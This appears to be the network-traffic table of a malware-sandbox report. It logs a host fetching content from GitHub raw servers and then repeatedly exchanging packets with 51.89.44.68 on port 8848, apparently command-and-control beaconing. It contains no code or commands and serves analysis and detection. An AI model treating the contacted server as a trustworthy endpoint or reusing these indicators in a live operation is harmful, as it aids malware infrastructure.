Dec 18, 2024 12:07:21.150988102 CET | 49732 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.151005983 CET | 443 | 49732 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:21.151051998 CET | 49732 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.151866913 CET | 49731 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.151905060 CET | 443 | 49731 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:21.151931047 CET | 49733 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.151943922 CET | 443 | 49733 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:21.151989937 CET | 49733 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.152017117 CET | 49731 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.319804907 CET | 49732 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.319823980 CET | 443 | 49732 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:21.321609020 CET | 49731 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.321625948 CET | 443 | 49731 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:21.321825981 CET | 49733 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.321846962 CET | 443 | 49733 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:21.322858095 CET | 49734 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.322870016 CET | 443 | 49734 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:21.323661089 CET | 49735 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.323673010 CET | 443 | 49735 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:21.323900938 CET | 49730 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.323926926 CET | 443 | 49730 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.534156084 CET | 443 | 49732 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.534244061 CET | 49732 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.536221981 CET | 443 | 49730 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.536292076 CET | 49730 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.537395954 CET | 443 | 49733 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.537440062 CET | 443 | 49734 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.537477016 CET | 49733 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.537517071 CET | 49734 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.537525892 CET | 443 | 49735 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.537589073 CET | 49735 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.538436890 CET | 443 | 49731 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.538521051 CET | 49731 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.543390036 CET | 49733 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.543399096 CET | 443 | 49733 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.543674946 CET | 443 | 49733 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.545429945 CET | 49734 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.545461893 CET | 443 | 49734 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.545764923 CET | 443 | 49734 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.546547890 CET | 49731 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.546580076 CET | 443 | 49731 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.546632051 CET | 49735 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.546637058 CET | 443 | 49735 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.546875954 CET | 443 | 49731 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.547086954 CET | 443 | 49735 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.548590899 CET | 49732 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.548604012 CET | 443 | 49732 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.548927069 CET | 443 | 49732 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.550623894 CET | 49730 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.550647020 CET | 443 | 49730 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.550945044 CET | 443 | 49730 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.585556030 CET | 49733 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.601186037 CET | 49735 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.601186037 CET | 49734 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.601186991 CET | 49731 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.601285934 CET | 49732 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.601293087 CET | 49730 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.614398956 CET | 49734 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.614485025 CET | 49732 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.614526987 CET | 49735 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.614541054 CET | 49733 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.614778996 CET | 49731 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.614989042 CET | 49730 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.659324884 CET | 443 | 49730 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.659333944 CET | 443 | 49731 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.659337044 CET | 443 | 49733 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.659337997 CET | 443 | 49732 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.659346104 CET | 443 | 49735 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.659349918 CET | 443 | 49734 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.978499889 CET | 443 | 49733 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.978576899 CET | 443 | 49733 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.978619099 CET | 443 | 49733 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.978688002 CET | 443 | 49733 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:22.978698015 CET | 49733 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.978755951 CET | 49733 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:22.991360903 CET | 49733 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:23.018893003 CET | 443 | 49732 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:23.019053936 CET | 443 | 49732 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:23.019177914 CET | 49732 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:23.019876957 CET | 49732 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:23.023808956 CET | 443 | 49735 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:23.023993969 CET | 443 | 49735 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:23.024049997 CET | 49735 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:23.024626017 CET | 49735 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:23.030822039 CET | 443 | 49731 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:23.030937910 CET | 443 | 49731 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:23.031027079 CET | 49731 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:23.031732082 CET | 49731 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:23.031956911 CET | 443 | 49734 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:23.032016039 CET | 443 | 49734 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:23.032049894 CET | 443 | 49734 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:23.032077074 CET | 49734 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:23.032107115 CET | 443 | 49734 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:23.032121897 CET | 443 | 49734 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:23.032166004 CET | 49734 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:23.033237934 CET | 49734 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:23.036866903 CET | 443 | 49730 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:23.036987066 CET | 443 | 49730 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:23.037182093 CET | 49730 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:23.038350105 CET | 49730 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:23.436557055 CET | 49736 | 443 | 192.168.2.4 | 20.233.83.145
Dec 18, 2024 12:07:23.436605930 CET | 443 | 49736 | 20.233.83.145 | 192.168.2.4
Dec 18, 2024 12:07:23.436670065 CET | 49736 | 443 | 192.168.2.4 | 20.233.83.145
Dec 18, 2024 12:07:23.437084913 CET | 49736 | 443 | 192.168.2.4 | 20.233.83.145
Dec 18, 2024 12:07:23.437103033 CET | 443 | 49736 | 20.233.83.145 | 192.168.2.4
Dec 18, 2024 12:07:25.027563095 CET | 443 | 49736 | 20.233.83.145 | 192.168.2.4
Dec 18, 2024 12:07:25.027698040 CET | 49736 | 443 | 192.168.2.4 | 20.233.83.145
Dec 18, 2024 12:07:25.029829025 CET | 49736 | 443 | 192.168.2.4 | 20.233.83.145
Dec 18, 2024 12:07:25.029853106 CET | 443 | 49736 | 20.233.83.145 | 192.168.2.4
Dec 18, 2024 12:07:25.030139923 CET | 443 | 49736 | 20.233.83.145 | 192.168.2.4
Dec 18, 2024 12:07:25.030983925 CET | 49736 | 443 | 192.168.2.4 | 20.233.83.145
Dec 18, 2024 12:07:25.075336933 CET | 443 | 49736 | 20.233.83.145 | 192.168.2.4
Dec 18, 2024 12:07:25.975148916 CET | 443 | 49736 | 20.233.83.145 | 192.168.2.4
Dec 18, 2024 12:07:25.975263119 CET | 443 | 49736 | 20.233.83.145 | 192.168.2.4
Dec 18, 2024 12:07:25.975317955 CET | 49736 | 443 | 192.168.2.4 | 20.233.83.145
Dec 18, 2024 12:07:25.975327969 CET | 443 | 49736 | 20.233.83.145 | 192.168.2.4
Dec 18, 2024 12:07:25.975339890 CET | 443 | 49736 | 20.233.83.145 | 192.168.2.4
Dec 18, 2024 12:07:25.975363970 CET | 49736 | 443 | 192.168.2.4 | 20.233.83.145
Dec 18, 2024 12:07:25.975393057 CET | 49736 | 443 | 192.168.2.4 | 20.233.83.145
Dec 18, 2024 12:07:25.975992918 CET | 49736 | 443 | 192.168.2.4 | 20.233.83.145
Dec 18, 2024 12:07:25.980243921 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:25.980298042 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:25.980355978 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:25.980673075 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:25.980689049 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.187140942 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.188968897 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:27.188983917 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.709816933 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.709960938 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.709988117 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.710082054 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:27.710110903 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.710155964 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:27.718169928 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.726633072 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.726686001 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:27.726702929 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.734549046 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.734601974 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:27.734608889 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.742961884 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.743057966 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:27.743065119 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.788713932 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:27.829896927 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.882477045 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:27.882489920 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.929404974 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:27.944298983 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.944312096 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.944330931 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.944339037 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.944355965 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.944406033 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:27.944416046 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.944463015 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:27.985382080 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.985390902 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.985413074 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.985420942 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.985454082 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:27.985467911 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:27.985479116 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:27.985507011 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:28.113924980 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:28.113939047 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:28.113967896 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:28.113996029 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:28.114017963 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:28.114033937 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:28.114043951 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:28.114069939 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:28.114083052 CET | 443 | 49737 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:28.114119053 CET | 49737 | 443 | 192.168.2.4 | 185.199.108.133
                                                                                Dec 18, 2024 12:07:28.114588976 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:31.000942945 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:31.123153925 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:31.123289108 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:31.130796909 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:31.252428055 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:32.400490999 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:32.414112091 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:32.534039974 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:32.819859982 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:32.866838932 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:36.522430897 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:36.642007113 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:36.642131090 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:36.764986038 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:49.799540997 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:49.919255018 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:49.919450045 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:50.039088964 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:50.343367100 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:50.398133993 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:50.534435987 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:50.547136068 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:50.666969061 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:50.667062044 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:50.786784887 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:55.919564009 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:55.960784912 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:56.110668898 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:56.163779020 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:03.079360008 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:03.203691006 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:03.203922987 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:03.325803995 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:03.621479988 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:03.663821936 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:03.813791990 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:03.815551996 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:03.936805964 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:03.936935902 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:04.056699038 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:16.351872921 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:16.471669912 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:16.471786976 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:16.591545105 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:16.893412113 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:16.945111036 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:17.084558010 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:17.086862087 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:17.206548929 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:17.206696987 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:17.326297045 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:25.906343937 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:25.960820913 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:26.097368002 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:26.148312092 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:29.633277893 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:29.752909899 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:29.753113985 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:29.873243093 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:30.182424068 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:30.226478100 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:30.375303030 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:30.376857042 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:30.496421099 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:30.496517897 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:30.616879940 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:42.923331976 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:43.043646097 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:43.043812037 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:43.163748026 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:43.481240988 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:43.523339987 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:43.675857067 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:43.677515030 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:43.797555923 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:43.797617912 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:43.919270039 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:55.912815094 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:55.961724043 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:56.105763912 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:56.148474932 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:56.196577072 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:56.321353912 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:56.321800947 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:56.484153986 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:56.769371033 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:56.820251942 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:56.961245060 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:56.963002920 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:57.083451986 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:57.083870888 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:57.204525948 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:09.477078915 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:09.599991083 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:09.600063086 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:09.719521046 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:10.022989035 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:10.070290089 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:10.214107037 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:10.215542078 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:10.336384058 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:10.336489916 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:10.456326962 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:22.758306980 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:22.878806114 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:22.878942013 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:22.998502016 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:23.301453114 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:23.351725101 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:23.490752935 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:23.492521048 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:23.615922928 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:23.615968943 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:23.735486984 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:25.149131060 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:25.273305893 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:25.274774075 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:25.553881884 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:25.838253021 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:25.883225918 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:26.029426098 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:26.070363045 CET497398848192.168.2.451.89.44.68
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 12:07:20.791562080 CET | 53991 | 53 | 192.168.2.4 | 1.1.1.1
Dec 18, 2024 12:07:20.929658890 CET | 53 | 53991 | 1.1.1.1 | 192.168.2.4
Dec 18, 2024 12:07:23.146152973 CET | 52196 | 53 | 192.168.2.4 | 1.1.1.1
Dec 18, 2024 12:07:23.284399033 CET | 53 | 52196 | 1.1.1.1 | 192.168.2.4
Dec 18, 2024 12:07:23.296003103 CET | 63504 | 53 | 192.168.2.4 | 1.1.1.1
Dec 18, 2024 12:07:23.435605049 CET | 53 | 63504 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 12:07:20.791562080 CET | 192.168.2.4 | 1.1.1.1 | 0xb809 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:07:23.146152973 CET | 192.168.2.4 | 1.1.1.1 | 0x264f | Standard query (0) | 41.140.13.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
